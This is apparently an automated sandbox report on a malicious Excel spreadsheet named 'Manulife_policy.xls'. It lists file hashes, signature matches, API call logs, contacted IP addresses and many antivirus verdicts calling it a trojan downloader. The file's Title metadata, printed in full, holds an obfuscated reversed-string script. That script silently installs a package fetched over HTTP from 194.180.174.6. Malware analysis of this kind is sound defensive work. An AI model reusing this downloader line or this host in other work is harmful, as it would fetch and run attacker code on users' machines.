Summary | ZeroBOX

Manulife_policy.xls

VBA_macro Generic Malware MSOffice File
Category Machine Started Completed
FILE s1_win7_x6401 Oct. 8, 2021, 2:45 p.m. Oct. 8, 2021, 2:47 p.m.
Size 67.0KB
Type Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Title: eval('})"6.471.081.491//:ptth"(tcudorPllatsnI;2=leveLIU{))"rellatsnI.rellatsnIswodniW"(tcejbOXevitcA wen(htiw'.split('').reverse().join('')), Author: Ferop, Last Saved By: ----, Name of Creating Application: Microsoft Excel, Create Time/Date: Tue Aug 17 12:24:08 2021, Last Saved Time/Date: Mon Oct 4 15:07:46 2021, Security: 0
MD5 128a2d6105360896238515c941c67f88
SHA256 4648edc370e61a52c95d3f525391e0154406fd661d01d091f2d9dba9f8a485f2
CRC32 B64001A3
ssdeep 1536:Gvyk3hbdlylKsgqopeJBWhZFGkE+cL2NdAIG7SPtKoSDu33ufGbD:kyk3hbdlylKsgqopeJBWhZFGkE+cL2ND
Yara
  • Contains_VBA_macro_code - Detect a MS Office document with embedded VBA macro code [binaries]
  • Generic_Malware_Zero - Generic Malware
  • Microsoft_Office_File_Zero - Microsoft Office File

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
164.124.101.2 Active Moloch
194.180.174.6 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 1908
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6dce1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1908
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6dd3f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1908
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6dd3f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1908
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6dc81000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1908
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x65001000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1908
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6dba1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1908
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6db81000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1908
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6de21000
process_handle: 0xffffffff
1 0 0
host 194.180.174.6
Lionic Trojan.MSOffice.SLoad.a!c
MicroWorld-eScan VB:Trojan.Valyria.5424
FireEye VB:Trojan.Valyria.5424
CAT-QuickHeal OLE.ZAgent.44466
ALYac Trojan.Downloader.XLS.Gen
Cyren Trojan.MWLF-21
Symantec W97M.Downloader
ESET-NOD32 VBA/TrojanDownloader.Agent.WSK
TrendMicro-HouseCall Trojan.X97M.DLOADR.TIOIBEPP
Kaspersky HEUR:Trojan-Downloader.MSOffice.SLoad.gen
BitDefender VB:Trojan.Valyria.5424
Ad-Aware VB:Trojan.Valyria.5424
Sophos Troj/DocDl-AEKW
Comodo TrojWare.Win32.UMal.vrybv@0
DrWeb X97M.DownLoader.723
TrendMicro Trojan.X97M.DLOADR.TIOIBEPP
McAfee-GW-Edition W97M/Downloader.bhx
Emsisoft VB:Trojan.Valyria.5424 (B)
Microsoft TrojanDownloader:O97M/Obfuse.BK!MTB
ViRobot X97M.S.Downloader.68608.E
ZoneAlarm HEUR:Trojan-Downloader.MSOffice.SLoad.gen
GData VB:Trojan.Valyria.5424
McAfee W97M/Downloader.bhx
Ikarus Trojan-Downloader.VBA.Agent
Fortinet VBA/Agent.BHX!tr.dldr
dead_host 194.180.174.6:80